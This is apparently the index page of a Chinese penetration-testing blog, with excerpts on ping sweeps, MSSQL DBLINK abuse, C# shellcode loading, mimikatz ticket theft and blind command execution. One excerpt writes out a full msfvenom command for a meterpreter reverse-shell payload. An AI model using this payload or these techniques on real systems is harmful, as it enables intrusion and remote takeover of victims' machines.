一个博客

Windows-bat

学习记录

Windows-bat记录记一记，一切都是为了方便我平常时候复制。常用的cmd记录。不同的应用场景。批量ping # ping B段的用法 for /L %a in (1,1,254) do (for /L %b in (1,1,254) do ping -n 1 192.168.%a.%b

mssql数据库之dblink

中级安全

MSSQL数据库之DBLINK DBLINK，翻译为中文是**数据库链接**，如同字面意思一样，就是数据库本身链接了其他的数据库，又名链接服务器，而这一配置，在MSSQL数据库中比较常见，且如果目标配置了DBLINK，则更加的有利于我们的工作。实际工作中，可能遇到以下的利用情况：通过SQL注入，

csharp非-常规加载shellcode

安全类

c#非常规加载shellcode 该方法来源于国外某博客，在查阅并学习国外安全技术的过程中发现，遂记录一下。但是不得不说，这个方式是2020年5月的时候就已经出现了，但是目前网络上搜索c#加载shellcode的方式的话，绝大部分仍然是哪几种，不一样的仅是在加载shellcode的基础上添加了一下

PowerShell一些笔记

初级安全

Powershell使用 msf生成后门： msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=8080 --arch x64 --platform windows -f psh-reflection -o test

Windows一些笔记

初级安全

Windows笔记本基本命令使用 bat脚本替换文件内容：挖草，记得啥东西也记不得了。 for /f %i in (1.txt) do (set STR=%i & set RESULT=%STR:\=-% & set RESULT=%STR::=oo% echo %RESULT%) bat中按行

Windows域内一些笔记

初级安全

域内窃取票据有时候环境比较恶劣，目标机器无法上线，所以无法直接使用cs来窃取进程的token信息。条件允许的情况下，上传mimikatz，至于免杀就只有自行想其他办法，然后选个合适的时间登录远程桌面进行操作。原文链接：https://paper.seebug.org/1669 直接上手操作，原理

Hello Halo

默认分类

如果你看到了这一篇文章，那么证明你已经安装成功了，感谢使用 Halo 进行创作，希望能够使用愉快。

python3提取html标签内容

不安全类

瞎搞的原因测试过程中使用BurpSuite的Intruder模块进行攻击后，由于测试的payload较多，并且Response返回值通常包含了HTTP响应头以及响应主体，如果需要手动从成百上千个文件中提取出想要的数据，会比较麻烦，所以就自己写了一个脚本，用于获取Response中指定的文本内容。

记一次稀里糊涂getshell的测试

初级安全

前言记录一次授权的测试，这个目标是真的太难了太难了太难了，网上能查找到的信息很少，最多只能找到一些学号，职工号以及身份证来来回回找了将近一个月都没找到，心力憔悴。学校所有的域名都解析到了同一个IP地址，并且这个IP上有很强很强的防护措施(*甚至连一个单引号就直接连接重置,过分*)，前期一点进展也没

关于命令执行无回显的那档子事

初级安全

关于命令执行无回显的那档子事有时候千辛万苦的拿到一个RCE的入口点或突破点，但是那个RCE点位却无法回显，导致我们执行的任何命令都看不到结果，这样非常影响我们的下一步操作。获得回显目前获得回显的主要方式是通过dnslog，但是个人感觉dnslog有些不完美，不可控（只是我不咋会用的原因），这样